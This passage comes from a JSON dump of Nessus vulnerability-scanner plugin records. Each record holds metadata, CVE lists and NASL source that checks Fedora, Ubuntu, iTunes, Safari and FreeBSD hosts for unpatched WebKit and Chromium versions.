get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"chromium-70.0.3538.110-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:24", "description": "A large number of security issues were discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-05-01T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 17.10 : WebKitGTK+ vulnerabilities (USN-3635-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4101", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4133", "CVE-2018-4146", "CVE-2018-4161", "CVE-2018-4162", "CVE-2018-4163", "CVE-2018-4165"], "modified": "2020-09-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.10"], "id": "UBUNTU_USN-3635-1.NASL", "href": "https://www.tenable.com/plugins/nessus/109468", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3635-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109468);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2018-4101\", \"CVE-2018-4113\", \"CVE-2018-4114\", \"CVE-2018-4117\", \"CVE-2018-4118\", \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4122\", \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\", \"CVE-2018-4133\", \"CVE-2018-4146\", \"CVE-2018-4161\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\");\n script_xref(name:\"USN\", value:\"3635-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 17.10 : WebKitGTK+ vulnerabilities (USN-3635-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3635-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected libjavascriptcoregtk-4.0-18 and / or\nlibwebkit2gtk-4.0-37 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Webkit JIT Exploit for iOS 7.1.2');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2020 Canonical, Inc. / NASL script (C) 2018-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|17\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 17.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.20.1-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.20.1-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.20.1-0ubuntu0.17.10.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.20.1-0ubuntu0.17.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:41", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.7.4. 
It is, therefore, affected by multiple vulnerabilities in WebKit as referenced in the HT208694 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-04-03T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.7.4 WebKit Multiple Vulnerabilities (credentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4101", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4121", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4130", "CVE-2018-4144", "CVE-2018-4146", "CVE-2018-4161", "CVE-2018-4163", "CVE-2018-4165"], "modified": "2019-04-05T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_4.NASL", "href": "https://www.tenable.com/plugins/nessus/108795", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108795);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/04/05 23:25:09\");\n\n script_cve_id(\n \"CVE-2018-4101\",\n \"CVE-2018-4113\",\n \"CVE-2018-4114\",\n \"CVE-2018-4117\",\n \"CVE-2018-4118\",\n \"CVE-2018-4119\",\n \"CVE-2018-4120\",\n \"CVE-2018-4121\",\n \"CVE-2018-4122\",\n \"CVE-2018-4125\",\n \"CVE-2018-4127\",\n \"CVE-2018-4128\",\n \"CVE-2018-4129\",\n \"CVE-2018-4130\",\n \"CVE-2018-4144\",\n \"CVE-2018-4146\",\n \"CVE-2018-4161\",\n \"CVE-2018-4163\",\n \"CVE-2018-4165\"\n);\n script_bugtraq_id(102775);\n\n script_name(english:\"Apple iTunes < 12.7.4 WebKit Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.4. It is, therefore, affected by multiple vulnerabilities\nin WebKit as referenced in the HT208694 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208694\");\n script_set_attribute(attribute:\"solution\", value:\n \"Upgrade to Apple iTunes version 12.7.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4144\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\n# Ensure this is Windows\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\n\nconstraints = [{\"fixed_version\" : \"12.7.4\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:32:51", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.7.4. It is, therefore, affected by multiple vulnerabilities in WebKit as referenced in the HT208694 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-04-03T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.7.3 WebKit Multiple Vulnerabilities (uncredentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4101", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4121", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4130", "CVE-2018-4144", "CVE-2018-4146", "CVE-2018-4161", "CVE-2018-4163", "CVE-2018-4165"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_4_BANNER.NASL", "href": "https://www.tenable.com/plugins/nessus/108796", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108796);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2018-4101\",\n \"CVE-2018-4113\",\n \"CVE-2018-4114\",\n 
\"CVE-2018-4117\",\n \"CVE-2018-4118\",\n \"CVE-2018-4119\",\n \"CVE-2018-4120\",\n \"CVE-2018-4121\",\n \"CVE-2018-4122\",\n \"CVE-2018-4125\",\n \"CVE-2018-4127\",\n \"CVE-2018-4128\",\n \"CVE-2018-4129\",\n \"CVE-2018-4130\",\n \"CVE-2018-4144\",\n \"CVE-2018-4146\",\n \"CVE-2018-4161\",\n \"CVE-2018-4163\",\n \"CVE-2018-4165\"\n );\n script_bugtraq_id(102775);\n\n script_name(english:\"Apple iTunes < 12.7.3 WebKit Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.4. It is, therefore, affected by multiple vulnerabilities\nin WebKit as referenced in the HT208694 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208474\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.7.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4144\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/29\");\n 
(CVE-2017-7064)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-24T00:00:00", "type": "nessus", "title": "macOS : Apple Safari < 10.1.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7006", "CVE-2017-7011", "CVE-2017-7012", "CVE-2017-7018", "CVE-2017-7019", "CVE-2017-7020", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7038", "CVE-2017-7039", "CVE-2017-7040", "CVE-2017-7041", "CVE-2017-7042", "CVE-2017-7043", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7049", "CVE-2017-7052", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7059", "CVE-2017-7060", "CVE-2017-7061", "CVE-2017-7064"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/a:apple:safari"], "id": "MACOSX_SAFARI10_1_2.NASL", "href": "https://www.tenable.com/plugins/nessus/101931", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101931);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/14 1:59:37\");\n\n script_cve_id(\n \"CVE-2017-7006\",\n \"CVE-2017-7011\",\n \"CVE-2017-7012\",\n \"CVE-2017-7018\",\n \"CVE-2017-7019\",\n \"CVE-2017-7020\",\n \"CVE-2017-7030\",\n \"CVE-2017-7034\",\n \"CVE-2017-7037\",\n \"CVE-2017-7038\",\n \"CVE-2017-7039\",\n \"CVE-2017-7040\",\n \"CVE-2017-7041\",\n \"CVE-2017-7042\",\n \"CVE-2017-7043\",\n \"CVE-2017-7046\",\n \"CVE-2017-7048\",\n \"CVE-2017-7049\",\n \"CVE-2017-7052\",\n \"CVE-2017-7055\",\n \"CVE-2017-7056\",\n \"CVE-2017-7059\",\n \"CVE-2017-7060\",\n \"CVE-2017-7061\",\n \"CVE-2017-7064\"\n );\n script_bugtraq_id(\n 99885,\n 99886,\n 99887,\n 99888,\n 99890\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-07-19-5\");\n script_xref(name:\"ZDI\", value:\"ZDI-17-489\");\n\n script_name(english:\"macOS : Apple Safari < 10.1.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", 
value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X\nhost is prior to 10.1.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An information disclosure vulnerability exists in the\n WebKit component due to improper handling of SVG filters.\n An unauthenticated, remote attacker can exploit this,\n via a timing side-channel attack, to disclose sensitive\n cross-domain information. (CVE-2017-7006)\n\n - An unspecified flaw exists that allows an\n unauthenticated, remote attacker to spoof the address\n bar via a specially crafted website. (CVE-2017-7011)\n\n - Multiple memory corruption issues exists in the 'WebKit\n Web Inspector' component due to improper validation of\n input. An unauthenticated, remote attacker can exploit\n these issues, via a specially crafted web page, to\n execute arbitrary code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - Multiple cross-site scripting (XSS) vulnerabilities\n exist in the WebKit component in the DOMParser due to\n improper validation of user-supplied input before\n returning it to users. 
An unauthenticated, remote\n attacker can exploit these issue, via a specially\n crafted URL, to execute arbitrary script code in a\n user's browser session. (CVE-2017-7038, CVE-2017-7059)\n\n - A denial of service vulnerability exists in the Safari\n Printing component. An unauthenticated, remote attacker\n can exploit this, via a specially crafted web page, to\n create an infinite number of print dialogs.\n (CVE-2017-7060)\n\n - An unspecified memory initialization flaw exists in\n WebKit. A local attacker can exploit this, via a\n specially crafted application, to disclose restricted\n memory. (CVE-2017-7064)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207921\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2017/Jul/39\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 10.1.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network 
Security, Inc.\");\n\n script_dependencies(\"macosx_Safari31.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X or macOS\");\n\nif (!preg(pattern:\"Mac OS X 10\\.(10|11|12)([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X Yosemite 10.10 / Mac OS X El Capitan 10.11 / macOS Sierra 10.12\");\n\ninstalled = get_kb_item_or_exit(\"MacOSX/Safari/Installed\", exit_code:0);\npath = get_kb_item_or_exit(\"MacOSX/Safari/Path\", exit_code:1);\nversion = get_kb_item_or_exit(\"MacOSX/Safari/Version\", exit_code:1);\n\nfixed_version = \"10.1.2\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n \"Path\", path,\n \"Installed version\", version,\n \"Fixed version\", fixed_version\n ),\n ordered_fields:make_list(\"Path\", \"Installed version\", \"Fixed version\")\n );\n security_report_v4(port:0, severity:SECURITY_HOLE, extra:report, xss:true);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Safari\", version, path);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:35:57", "description": "The Webkit gtk team reports :\n\nPlease reference CVE/URL list for details", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-26T00:00:00", "type": "nessus", "title": "FreeBSD : webkit2-gtk3 -- multiple vulnerabilities (0f66b901-715c-11e7-ad1f-bcaec565249c)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7006", "CVE-2017-7011", "CVE-2017-7012", "CVE-2017-7018", "CVE-2017-7019", "CVE-2017-7020", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", 
"CVE-2017-7038", "CVE-2017-7039", "CVE-2017-7040", "CVE-2017-7041", "CVE-2017-7042", "CVE-2017-7043", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7049", "CVE-2017-7052", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7059", "CVE-2017-7061", "CVE-2017-7064"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:webkit2-gtk3", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_0F66B901715C11E7AD1FBCAEC565249C.NASL", "href": "https://www.tenable.com/plugins/nessus/101966", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101966);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-7006\", \"CVE-2017-7011\", \"CVE-2017-7012\", \"CVE-2017-7018\", \"CVE-2017-7019\", \"CVE-2017-7020\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7038\", \"CVE-2017-7039\", \"CVE-2017-7040\", \"CVE-2017-7041\", \"CVE-2017-7042\", \"CVE-2017-7043\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7049\", \"CVE-2017-7052\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7059\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n\n script_name(english:\"FreeBSD : webkit2-gtk3 -- multiple vulnerabilities (0f66b901-715c-11e7-ad1f-bcaec565249c)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Webkit gtk team reports :\n\nPlease reference CVE/URL list for details\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2017-0006.html\"\n );\n # https://vuxml.freebsd.org/freebsd/0f66b901-715c-11e7-ad1f-bcaec565249c.html\n script_set_attribute(\n attribute:\"see_also\",\n 
